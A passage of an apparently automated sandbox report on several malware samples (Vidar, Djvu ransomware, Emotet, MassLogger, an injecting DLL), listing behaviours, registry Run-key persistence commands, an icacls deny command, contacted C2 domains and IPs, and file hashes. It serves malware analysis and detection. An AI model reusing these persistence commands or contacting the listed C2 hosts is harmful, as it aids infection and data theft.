| Set value (str) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Ciavy = "regsvr32.exe /s C:\\Users\\Admin\\AppData\\Roaming\\Dauxp\\ykceuzx.dll" | C:\Windows\SysWOW64\msiexec.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2264 set thread context of 3596 | N/A | C:\Windows\SysWOW64\rundll32.exe | C:\Windows\SysWOW64\msiexec.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2780 wrote to memory of 2264 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2780 wrote to memory of 2264 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2780 wrote to memory of 2264 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2264 wrote to memory of 3596 | N/A | C:\Windows\SysWOW64\rundll32.exe | C:\Windows\SysWOW64\msiexec.exe |
| PID 2264 wrote to memory of 3596 | N/A | C:\Windows\SysWOW64\rundll32.exe | C:\Windows\SysWOW64\msiexec.exe |
| PID 2264 wrote to memory of 3596 | N/A | C:\Windows\SysWOW64\rundll32.exe | C:\Windows\SysWOW64\msiexec.exe |
| PID 2264 wrote to memory of 3596 | N/A | C:\Windows\SysWOW64\rundll32.exe | C:\Windows\SysWOW64\msiexec.exe |
| PID 2264 wrote to memory of 3596 | N/A | C:\Windows\SysWOW64\rundll32.exe | C:\Windows\SysWOW64\msiexec.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\str.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\str.dll,#1
C:\Windows\SysWOW64\msiexec.exe
msiexec.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.163.202.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.42.69.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 69.190.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | militanttra.at | udp |
| US | 8.8.8.8:53 | militanttra.at | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | militanttra.at | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
Files
memory/2264-0-0x0000000074B72000-0x0000000074B75000-memory.dmp
memory/2264-2-0x0000000074B10000-0x0000000074B9B000-memory.dmp
memory/2264-1-0x0000000074B10000-0x0000000074B9B000-memory.dmp
memory/2264-3-0x0000000074B10000-0x0000000074B9B000-memory.dmp
memory/2264-4-0x0000000074B72000-0x0000000074B75000-memory.dmp
memory/3596-7-0x00000000005A0000-0x00000000005CB000-memory.dmp
memory/2264-9-0x0000000074B10000-0x0000000074B9B000-memory.dmp
memory/3596-11-0x00000000005A0000-0x00000000005CB000-memory.dmp
memory/3596-12-0x00000000005A0000-0x00000000005CB000-memory.dmp
Analysis: behavioral31
Detonation Overview
Submitted
2024-12-04 19:31
Reported
2024-12-04 19:36
Platform
win10v2004-20241007-en
Max time kernel
140s
Max time network
162s
Command Line
Signatures
Vidar
Vidar family
Vidar Stealer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Reads local data of messenger clients
Reads user/profile data of local email clients
Reads user/profile data of web browsers
Accesses 2FA software files, possible credential harvesting
Checks installed software on the system
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Processes
C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요.exe
"C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | centos10.com | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 212.20.149.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 69.190.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | centos10.com | udp |
Files
memory/4532-1-0x0000000000A40000-0x0000000000B40000-memory.dmp
memory/4532-2-0x00000000026A0000-0x0000000002729000-memory.dmp
memory/4532-3-0x0000000000400000-0x000000000048D000-memory.dmp
memory/4532-15-0x0000000000400000-0x000000000088B000-memory.dmp
memory/4532-16-0x0000000000A40000-0x0000000000B40000-memory.dmp
memory/4532-17-0x00000000026A0000-0x0000000002729000-memory.dmp
memory/4532-18-0x0000000000400000-0x000000000048D000-memory.dmp
Analysis: behavioral1
Detonation Overview
Submitted
2024-12-04 19:31
Reported
2024-12-04 19:36
Platform
win10v2004-20241007-en
Max time kernel
93s
Max time network
155s
Command Line
Signatures
Detected Djvu ransomware
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Djvu Ransomware
Djvu family
Renames multiple (174) files with added filename extension
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\ec4f09f82d932cdd40700a74a8875b73a783cbaab1f313286adf615a5336d7d3.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\f89826d1-4dc5-4b5f-97ed-4f2e82818dc2\ec4f09f82d932cdd40700a74a8875b73a783cbaab1f313286adf615a5336d7d3.exe | N/A |
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\f89826d1-4dc5-4b5f-97ed-4f2e82818dc2\\ec4f09f82d932cdd40700a74a8875b73a783cbaab1f313286adf615a5336d7d3.exe\" --AutoStart" | C:\Users\Admin\AppData\Local\Temp\ec4f09f82d932cdd40700a74a8875b73a783cbaab1f313286adf615a5336d7d3.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.2ip.ua | N/A | N/A |
| N/A | api.2ip.ua | N/A | N/A |
| N/A | api.2ip.ua | N/A | N/A |
| N/A | api.2ip.ua | N/A | N/A |
Enumerates physical storage devices
Program crash
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\icacls.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\ec4f09f82d932cdd40700a74a8875b73a783cbaab1f313286adf615a5336d7d3.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\f89826d1-4dc5-4b5f-97ed-4f2e82818dc2\ec4f09f82d932cdd40700a74a8875b73a783cbaab1f313286adf615a5336d7d3.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\ec4f09f82d932cdd40700a74a8875b73a783cbaab1f313286adf615a5336d7d3.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\ec4f09f82d932cdd40700a74a8875b73a783cbaab1f313286adf615a5336d7d3.exe
"C:\Users\Admin\AppData\Local\Temp\ec4f09f82d932cdd40700a74a8875b73a783cbaab1f313286adf615a5336d7d3.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Users\Admin\AppData\Local\f89826d1-4dc5-4b5f-97ed-4f2e82818dc2" /deny *S-1-1-0:(OI)(CI)(DE,DC)
C:\Users\Admin\AppData\Local\Temp\ec4f09f82d932cdd40700a74a8875b73a783cbaab1f313286adf615a5336d7d3.exe
"C:\Users\Admin\AppData\Local\Temp\ec4f09f82d932cdd40700a74a8875b73a783cbaab1f313286adf615a5336d7d3.exe" --Admin IsNotAutoStart IsNotTask
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 4340 -ip 4340
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4340 -s 1868
C:\Users\Admin\AppData\Local\f89826d1-4dc5-4b5f-97ed-4f2e82818dc2\ec4f09f82d932cdd40700a74a8875b73a783cbaab1f313286adf615a5336d7d3.exe
C:\Users\Admin\AppData\Local\f89826d1-4dc5-4b5f-97ed-4f2e82818dc2\ec4f09f82d932cdd40700a74a8875b73a783cbaab1f313286adf615a5336d7d3.exe --Task
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 4040 -ip 4040
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4040 -s 1640
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 3340 -ip 3340
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3340 -s 1792
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.2ip.ua | udp |
| US | 172.67.139.220:443 | api.2ip.ua | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 142.250.200.3:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | 220.139.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.200.250.142.in-addr.arpa | udp |
| US | 172.67.139.220:443 | api.2ip.ua | tcp |
| US | 8.8.8.8:53 | dell1.ug | udp |
| US | 8.8.8.8:53 | dell1.ug | udp |
| US | 8.8.8.8:53 | dell1.ug | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | dell1.ug | udp |
| US | 172.67.139.220:443 | api.2ip.ua | tcp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.42.69.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.190.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
Files
memory/4340-1-0x0000000006DC0000-0x0000000006E8C000-memory.dmp
memory/4340-2-0x0000000006E90000-0x0000000006FAA000-memory.dmp
memory/4340-3-0x0000000000400000-0x0000000000537000-memory.dmp
C:\Users\Admin\AppData\Local\f89826d1-4dc5-4b5f-97ed-4f2e82818dc2\ec4f09f82d932cdd40700a74a8875b73a783cbaab1f313286adf615a5336d7d3.exe
| MD5 | d592e787314d1c327dbc2da117e1dc59 |
| SHA1 | ba3a26eaa200d53129e304078309758bbb3c95f1 |
| SHA256 | ec4f09f82d932cdd40700a74a8875b73a783cbaab1f313286adf615a5336d7d3 |
| SHA512 | 1e805105ab482c752bd24afa028daa3e7bd83f0258510a6fa2ea0c90eb44d1eec590c926982252dbf3a28bb070befbaea5e78c00d556bd9b380a3c79f1480cf7 |
memory/4340-16-0x0000000000400000-0x0000000000537000-memory.dmp
memory/4340-15-0x0000000006E90000-0x0000000006FAA000-memory.dmp
memory/4340-14-0x0000000000400000-0x0000000004EE3000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B46811C17859FFB409CF0E904A4AA8F8
| MD5 | 971c514f84bba0785f80aa1c23edfd79 |
| SHA1 | 732acea710a87530c6b08ecdf32a110d254a54c8 |
| SHA256 | f157ed17fcaf8837fa82f8b69973848c9b10a02636848f995698212a08f31895 |
| SHA512 | 43dc1425d80e170c645a3e3bb56da8c3acd31bd637329e9e37094ac346ac85434df4edcdbefc05ae00aea33a80a88e2af695997a495611217fe6706075a63c58 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8
| MD5 | 67dc90f66ee215dd0b9d8e0a788ac276 |
| SHA1 | d8d891fbe208a2da7c2848d3ac9af1de5be99fcb |
| SHA256 | ee9dab168ef8f4089402b0febb95f14a5b3258f4e2504a90f619041131a86d82 |
| SHA512 | 711d5d90ea75fddd3fe341745c3c8a0f94b866ab6bc0f9a3fcb7f81fab58536f46eba21dd0ad486af960513924b595290493442228b4a02636a6189be8c75abf |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8B2B9A00839EED1DFDCCC3BFC2F5DF12
| MD5 | 67e486b2f148a3fca863728242b6273e |
| SHA1 | 452a84c183d7ea5b7c015b597e94af8eef66d44a |
| SHA256 | facaf1c3a4bf232abce19a2d534e495b0d3adc7dbe3797d336249aa6f70adcfb |
| SHA512 | d3a37da3bb10a9736dc03e8b2b49baceef5d73c026e2077b8ebc1b786f2c9b2f807e0aa13a5866cf3b3cafd2bc506242ef139c423eaffb050bbb87773e53881e |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12
| MD5 | 5b000b189f5387eec1f3217964104c2f |
| SHA1 | eecbada8c2734cd8e6629ea3c4635e883331c037 |
| SHA256 | f48e66d51e27aeba28e5c95361e5c1afb28f1a5bdb043cbc9b12af581e6a9141 |
| SHA512 | 04f0a0e0b5ee7761ae1046ea17f386d59072997ec64ccc755727f3a744301a8dc7f71d962a10323ae3e1becedfe615bb4b979800f12af9f7a819edc32877bb7a |
memory/3340-22-0x0000000000400000-0x0000000004EE3000-memory.dmp
memory/4040-25-0x0000000000400000-0x0000000004EE3000-memory.dmp
memory/3340-28-0x0000000000400000-0x0000000004EE3000-memory.dmp
memory/3340-378-0x0000000000400000-0x0000000004EE3000-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2024-12-04 19:31
Reported
2024-12-04 19:36
Platform
win10v2004-20241007-en
Max time kernel
136s
Max time network
148s
Command Line
Signatures
Emotet
Emotet family
Emotet payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\BTAGService\ole2nls.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\SysWOW64\BTAGService\ole2nls.exe | C:\Users\Admin\AppData\Local\Temp\emotet_exe_e1_ef536781ae8be4b67a7fb8aa562d84994ad250d97d5606115b6f4e6e2992363f_2020-11-17__174504.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\emotet_exe_e1_ef536781ae8be4b67a7fb8aa562d84994ad250d97d5606115b6f4e6e2992363f_2020-11-17__174504.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\BTAGService\ole2nls.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\BTAGService\ole2nls.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\BTAGService\ole2nls.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\BTAGService\ole2nls.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\BTAGService\ole2nls.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\BTAGService\ole2nls.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\BTAGService\ole2nls.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\BTAGService\ole2nls.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\BTAGService\ole2nls.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\BTAGService\ole2nls.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\BTAGService\ole2nls.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\BTAGService\ole2nls.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\BTAGService\ole2nls.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\BTAGService\ole2nls.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\BTAGService\ole2nls.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\BTAGService\ole2nls.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\BTAGService\ole2nls.exe | N/A |
Suspicious behavior: RenamesItself
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\emotet_exe_e1_ef536781ae8be4b67a7fb8aa562d84994ad250d97d5606115b6f4e6e2992363f_2020-11-17__174504.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\emotet_exe_e1_ef536781ae8be4b67a7fb8aa562d84994ad250d97d5606115b6f4e6e2992363f_2020-11-17__174504.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\BTAGService\ole2nls.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4168 wrote to memory of 220 | N/A | C:\Users\Admin\AppData\Local\Temp\emotet_exe_e1_ef536781ae8be4b67a7fb8aa562d84994ad250d97d5606115b6f4e6e2992363f_2020-11-17__174504.exe | C:\Windows\SysWOW64\BTAGService\ole2nls.exe |
| PID 4168 wrote to memory of 220 | N/A | C:\Users\Admin\AppData\Local\Temp\emotet_exe_e1_ef536781ae8be4b67a7fb8aa562d84994ad250d97d5606115b6f4e6e2992363f_2020-11-17__174504.exe | C:\Windows\SysWOW64\BTAGService\ole2nls.exe |
| PID 4168 wrote to memory of 220 | N/A | C:\Users\Admin\AppData\Local\Temp\emotet_exe_e1_ef536781ae8be4b67a7fb8aa562d84994ad250d97d5606115b6f4e6e2992363f_2020-11-17__174504.exe | C:\Windows\SysWOW64\BTAGService\ole2nls.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\emotet_exe_e1_ef536781ae8be4b67a7fb8aa562d84994ad250d97d5606115b6f4e6e2992363f_2020-11-17__174504.exe
"C:\Users\Admin\AppData\Local\Temp\emotet_exe_e1_ef536781ae8be4b67a7fb8aa562d84994ad250d97d5606115b6f4e6e2992363f_2020-11-17__174504.exe"
C:\Windows\SysWOW64\BTAGService\ole2nls.exe
"C:\Windows\SysWOW64\BTAGService\ole2nls.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 12.163.208.58:80 | tcp | |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.42.69.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 182.129.81.91.in-addr.arpa | udp |
| US | 45.33.35.74:8080 | tcp | |
| DE | 87.106.253.248:8080 | tcp | |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 192.241.146.84:8080 | tcp | |
| NL | 190.115.18.139:8080 | tcp | |
| US | 65.36.62.20:80 | tcp | |
| BR | 170.81.48.2:80 | tcp |
Files
memory/4168-4-0x00000000022F0000-0x0000000002300000-memory.dmp
memory/4168-0-0x0000000002280000-0x0000000002292000-memory.dmp
memory/4168-7-0x0000000002270000-0x000000000227F000-memory.dmp
C:\Windows\SysWOW64\BTAGService\ole2nls.exe
| MD5 | cbe9aa4dce4217491cf9bffae2c66537 |
| SHA1 | 2b7a15303157f8b9f1cce01e5e7a130628eb2c22 |
| SHA256 | ef536781ae8be4b67a7fb8aa562d84994ad250d97d5606115b6f4e6e2992363f |
| SHA512 | 71e2736fafa1be308ef341a937a1c6d0dc5a311952bfb9bfbd492c2e16950508f1aea5e63a8e3614c9a35cdc6a684d3ff6e2dba38fe483af74508d3df41262a5 |
memory/4168-9-0x0000000000400000-0x0000000000484000-memory.dmp
memory/220-14-0x0000000000610000-0x0000000000620000-memory.dmp
memory/220-10-0x0000000000630000-0x0000000000642000-memory.dmp
Analysis: behavioral19
Detonation Overview
Submitted
2024-12-04 19:31
Reported
2024-12-04 19:36
Platform
win10v2004-20241007-en
Max time kernel
91s
Max time network
156s
Command Line
Signatures
MassLogger
MassLogger Main payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Masslogger family
ReZer0 packer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\mouse_2.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\mouse_2.exe | N/A |
Reads user/profile data of web browsers
Accesses Microsoft Outlook profiles
| Description | Indicator | Process | Target |
| Key queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook | C:\Users\Admin\AppData\Local\Temp\mouse_2.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\mouse_2.exe | N/A |
| Key queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\mouse_2.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\mouse_2.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook | C:\Users\Admin\AppData\Local\Temp\mouse_2.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\mouse_2.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\mouse_2.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | C:\Users\Admin\AppData\Local\Temp\mouse_2.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\mouse_2.exe | N/A |
| Key queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\mouse_2.exe | N/A |
| Key queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook | C:\Users\Admin\AppData\Local\Temp\mouse_2.exe | N/A |
| Key queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\mouse_2.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook | C:\Users\Admin\AppData\Local\Temp\mouse_2.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\mouse_2.exe | N/A |
| Key queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | C:\Users\Admin\AppData\Local\Temp\mouse_2.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\mouse_2.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\mouse_2.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\mouse_2.exe | N/A |
Looks up external IP address via web service
